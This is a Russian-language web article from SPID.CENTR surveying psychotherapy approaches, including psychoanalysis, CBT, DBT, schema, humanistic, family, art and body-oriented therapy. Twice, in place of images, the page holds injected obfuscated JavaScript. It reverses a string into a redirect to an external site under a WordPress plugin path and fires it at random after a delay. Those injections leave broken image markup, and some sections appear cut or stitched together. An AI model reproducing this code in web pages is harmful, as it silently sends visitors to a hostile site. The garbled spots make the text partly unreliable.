Откуда у вас такие картинки? Полный гид по психотерапии

Обращения к психотерапевтам за последние лет десять в России стали нормой и стандартным поведением, если что-то пошло не так. Порой складывается впечатление, что психотерапия — панацея от всех проблем. Но в реальности все гораздо сложнее: методик множество, причем понять, чем они различаются и как выбрать нужного специалиста, крайне сложно. СПИД.ЦЕНТР публикует подробный гид по психотерапии, который поможет разобраться в ее многообразии, а также объяснит, к кому обращаться в том или ином случае.

ПСИХОЛОГ ИЛИ ПСИХОТЕРАПЕВТ?

Зачастую сложности с поиском специалиста начинаются с самого начала — как определить, кого искать: психолога или психотерапевта? В теории психолог — это специалист с высшим гуманитарным образованием, который консультирует людей по житейским проблемам: конфликты в отношениях, жизненный кризис и так далее.

Психотерапевт, согласно законам РФ, — врач с высшим медицинским образованием и обучившийся психотерапии. Он проводит терапию нетяжелых нарушений психики (например, тревожности, депрессий, социофобии) психологическими, то есть разговорными, методами. Если первый консультирует здоровых людей, то второй — помогает исправить нарушения.

Но на практике нет четкой границы между психологическим консультированием и психотерапией. Многие психологи прошли обучение психотерапии и предлагают именно эту услугу. Кроме того, ситуация осложняется отсутствием в России четких нормативов — что является психотерапией. На практике получается так, что психотерапевтом может называть себя любой человек, закончивший двух-трехлетние курсы, который при этом по основной профессии может быть, например, инженером или бухгалтером. По сути, он занимается психотерапией так же, как и врач-психотерапевт, — в рамках, которые успел освоить, — но чаще всего ему не хватает теоретических знаний, и он рискует пропустить симптомы психического расстройства.

Так, психоанализ утверждает, что человеком движут врожденные инстинкты и стремление к удовольствию, которые он обычно не осознает. А нарушения появляются при неудовлетворении базовых потребностей в раннем детстве и подавлении их во взрослом возрасте. Таким образом, главный конфликт человека — между инстинктивными потребностями и ограничениями, наложенными культурой.

Задача психоаналитика — провести своеобразное расследование и вытащить конфликт из области бессознательного на поверхность. Считается, что осознание внутреннего конфликта лишает его силы.

Основные методы работы — свободные ассоциации (то есть человек говорит все, что приходит в голову), расшифровка сновидений и фантазий, которые, по мнению Фрейда, открывают доступ к бессознательному. Анализ — процесс длительный (до нескольких лет регулярных сессий), дорогостоящий и при этом не гарантирующий результата. Психоаналитик будет выяснять самые интимные подробности из жизни клиента и искать истоки его проблем в самых ранних воспоминаниях. В литературе описано немало случаев избавления пациентов даже от бреда и галлюцинаций, но в среднем эффективность метода невысока.

Пример: Психоаналитик Маргерит Сешей в течение нескольких лет регулярно беседовала с девушкой Рене, больной шизофренией с детства. В какой-то момент пациентка отказалась от еды и могла умереть от истощения. Врач пришла к выводу, что девушке нанесло травму раннее отнятие от груди и недостаток внимания матери в младенческом возрасте. На сеансах психоанализа Маргерит фактически заменяла девушке мать и кормила ее яблоками, которые символизировали молоко матери.

Классический психоанализ, во время которого клиент лежит на кушетке, а психоаналитик безучастно записывает его высказывания, уходит в прошлое. Психоаналитики стали более эмпатичными, а их взгляды — более широкими. Они больше не стремятся объяснять все проблемы клиента сексуальной неудовлетворенностью и трудностями в первые 3—5 лет жизни.

С годами появилось множество школ и направлений, основанных учениками и последователями Зигмунда Фрейда.

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/5152/content_bipolar-therapy-cbt-Cognitive-Behavioral-Therapy.jpg” alt=”” />

Но в 1960-е годы психиатр Аарон Бек разработал принципиально новое направление — когнитивное. Он продемонстрировал, что между внешним событием и реакцией есть еще одно звено: мысли человека о произошедшем, из-за этого на одни и те же вещи мы все реагируем по-разному. Проблемы возникают из-за искажений мышления, допускаемых человеком при трактовке событий. Именно эти ошибочные мысли, а не событие само по себе, и вызывают бурю негативных эмоций. А следовательно, помочь человеку можно, научив его выявлять и корректировать эти искажения. В результате скрещения этих двух подходов и появилась современная когнитивно-поведенческая терапия, которая предлагает предельно четкие техники для конкретных ситуаций: например, как пережить паническую атаку, как улучшить концентрацию внимания, как справиться со стрессом.

Пример: Проблема клиентки — страх завязывать новые отношения.

Ситуация: Классный парень после первого свидания больше не объявляется.

Мысли: «Как и всегда, у меня ничего не получилось. Видно, моя судьба — остаться одинокой».

Эмоция: безнадежность, отчаяние.

Ошибка мышления: сверхобобщение

Корректировка мысли: «Я не произвела впечатления на этого конкретного парня. Но мне может повезти в следующий раз».

В когнитивно-поведенческом направлении есть несколько авторских методик психотерапии со своей спецификой. Вот несколько известных в России:

Диалектическая поведенческая терапия (DBT)

Это методика, направленная на предотвращение импульсивного деструктивного поведения (в том числе самоповреждений, злоупотребления вредными веществами, переедания).

Задача DBT-терапевта — помочь клиенту освоить четыре навыка: осознанность, управление эмоциями, эффективное взаимодействие с окружающими и переживание стресса.

Схема-терапия

Она разработана для людей, которым мешают развиваться устойчивые негативные шаблоны мышления, сформировавшиеся в детстве (их автор и назвал схемами). Как выяснил Джеффри Янг, все несчастные люди несчастны одинаково: он описал их страдания с помощью двух десятков типичных схем. Например, «я не заслуживаю любви», «я неудачник», «случится что-то плохое». Терапевт помогает клиенту выявить эти схемы и перестроить их на более гибкие и адекватные стратегии.

Курс когнитивно-поведенческой психотерапии включает ограниченное количество встреч (от нескольких недель до нескольких месяцев) и ставит практические задачи. Психотерапевт будет задавать упражнения и домашние задания. Сама терапия может проходить как индивидуально, так и в формате групповых тренингов.

В России множество хороших КПТ-терапевтов. Многие из них — врачи-психотерапевты, что идеально, если у вас есть психические проблемы.

Достоинства: Прагматичный, логичный подход. Доказанная эффективность при психических нарушениях. Набор действующих инструментов для решения конкретных задач. Короткие сроки.

Недостатки: Директивность и относительная поверхностность. Не ставит цели погружаться в переживания, искать истоки проблемы и решать экзистенциальные вопросы.

ГУМАНИСТИЧЕСКОЕ И ЭКЗИСТЕНЦИАЛЬНОЕ НАПРАВЛЕНИЕ

Гуманистическая психология полагает, что в каждом человеке заложена естественная потребность в развитии и самореализации, а проблемы возникают, если ей что-то препятствует. Специалист, работающий с этой методикой, предлагает в качестве помощи эмпатию, понимание и совместный поиск жизненных ценностей.

Гуманистическая школа очень разнородна. Фактически это «сборная солянка» методов, которые нельзя отнести ни к когнитивизму, ни к психоанализу.

Клиент-центрированная терапия

Карл Роджерс первым предложил считать опыт каждого человека ценным и уникальным, искать индивидуальный подход и общаться на равных. С его подачи обращение «пациент» (то есть больной) в психотерапии заменили на «клиент» (то есть равный партнер). Такая психотерапия предполагает самостоятельную возможность для человека понять, что для него лучше, а терапевт должен лишь создать условия принятия и поддержки для поиска пути к себе.

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/5155/content_Family.jpg” alt=”” />

СЕМЕЙНАЯ ПСИХОТЕРАПИЯ

Главная ее особенность — работа не с отдельным человеком, а с семьей как с единой системой. Семья рассматривается как организм, в котором проблемы одного человека (обычно ребенка или супруга с зависимостью) отражают напряженность в отношениях других. Таким образом, чтобы, например, решить проблему опасного поведения подростка, необходимо улучшить взаимоотношения его родителей.

АРТ-ТЕРАПИЯ

Сама по себе она не является отдельным направлением. Это набор методик, которыми пользуются психотерапевты разных специализаций, их объединяет цель самопознания не через слова и беседы с терапевтом, а через самовыражение в искусстве. Творческий процесс помогает осознать подавленные эмоции и выразить тяжелые чувства (например, боль, агрессию).

Отличие арт-терапии от обычных кружков рисования, пения или актерского мастерства в том, что терапевт рассматривает плоды творчества не как что-то отдельное, а как отражение личности клиента и его трудностей. Работы не подлежат критике и оценке, потому что главное условие терапии — принятие любого конструктивного самовыражения.

ТЕЛЕСНО-ОРИЕНТИРОВАННАЯ ПСИХОТЕРАПИЯ

Она, как и арт-терапия, — не самостоятельное направление психотерапии, а собрание разнородных практических методов. Их объединяет концепция целостности организма, то есть единства души и тела. Таким образом, воздействуя на тело, терапевт способствует разрешению психологических внутренних конфликтов и осознанию себя как целостного телесного существа.

Самой известной методикой можно назвать вегетотерапию Райха. Райх предположил, что подавленные эмоции отражаются в теле в виде мышечных зажимов. По расположению этих зажимов можно понять, с какими эмоциями нужно работать. Чаще всего это гнев, тревога и сексуальная неудовлетворенность, которые можно ослабить с помощью осознания подавленных эмоций, массажа и физических упражнений.

Но это не значит, что остальные направления менее полезны.

В психотерапии слишком велика роль человеческого фактора — каждый клиент приходит со своей проблемой и по-своему оценивает успешность ее решения. При этом одно из главных условий — доверие клиента терапевту и вера в результат. Именно по этой причине так плохо работает принудительная психотерапия, на которую в некоторых странах направляют нарушителей порядка.

Если человеку интересно часами обсуждать переживания раннего детства и искать скрытые причины поворотов своей судьбы — скорее всего, после сеанса психоанализа он почувствует себя лучше. Тому, кто считает это полной ерундой и хочет получить четкие инструкции для конкретной ситуации, больше подойдет когнитивно-поведенческая терапия. А если для вас первостепенны вопросы личного развития, поиска смысла в жизни или вы давно мечтаете просто выговориться без всяких оценок — стоит искать специалиста в гуманистическом направлении.

Подписывайтесь на канал  

Добавить комментарий